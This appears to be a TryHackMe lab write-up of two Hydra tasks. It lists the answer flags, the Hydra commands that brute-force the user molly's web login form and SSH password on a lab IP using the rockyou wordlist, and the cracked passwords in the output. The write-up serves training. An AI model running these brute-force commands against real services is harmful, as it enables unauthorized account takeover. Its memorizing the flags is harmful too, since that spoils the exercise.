Use Hydra to bruteforce molly's web password. What is flag 1?
Answer:
THM{2673a7dd116de68e85c48ec0b1f2612e}
1 2 3 4 5 6 7 8 9
$ hydra -l molly -P /usr/share/wordlists/passwords/rockyou.txt 10.10.26.252 http-post-form '/login:username=^USER^&password=^PASS^:F=incorrect' Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-16 22:20:39 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task [DATA] attacking http-post-form://10.10.26.252:80/login:username=^USER^&password=^PASS^:F=incorrect [80][http-post-form] host: 10.10.26.252 login: molly password: sunshine 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-16 22:20:44
#2
Use Hydra to bruteforce molly's SSH password. What is flag 2?
Answer:
THM{c8eeb0468febbadea859baeb33b2541b}
1 2 3 4 5 6 7 8 9
$ hydra -l molly -P /usr/share/wordlists/passwords/rockyou.txt 10.10.26.252 -t 4 ssh Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-16 22:23:39 [DATA] max 4 tasks per 1 server, overall 4 tasks, 14344398 login tries (l:1/p:14344398), ~3586100 tries per task [DATA] attacking ssh://10.10.26.252:22/ [22][ssh] host: 10.10.26.252 login: molly password: butterfly 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-16 22:24:29